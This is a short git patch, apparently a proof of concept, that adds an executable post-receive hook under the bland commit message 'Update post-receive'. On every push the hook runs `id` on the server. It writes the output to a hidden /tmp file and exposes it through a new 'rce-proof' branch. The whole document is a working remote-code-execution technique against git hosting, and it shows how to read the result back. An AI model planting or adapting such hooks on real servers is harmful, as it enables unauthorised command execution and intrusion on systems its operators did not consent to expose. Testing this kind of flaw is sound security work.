From 40decc7ae305d6f2428b924b64d3349a495f775e Mon Sep 17 00:00:00 2001 From: pocuserwjs8dr Date: Wed, 26 Aug 2026 21:57:54 +0000 Subject: [PATCH] Update post-receive --- hooks/post-receive | 5 +++++ 1 file changed, 5 insertions(+) create mode 100755 hooks/post-receive diff --git a/hooks/post-receive b/hooks/post-receive new file mode 100755 index 0000000..74a2d55 --- /dev/null +++ b/hooks/post-receive @@ -0,0 +1,5 @@ +#!/bin/sh +while read oldrev newrev refname; do + id > /tmp/.rce_output_wbbryi0j 2>&1 + id 2>&1 | git hash-object -w --stdin | xargs -I{} git update-ref refs/heads/rce-proof {} +done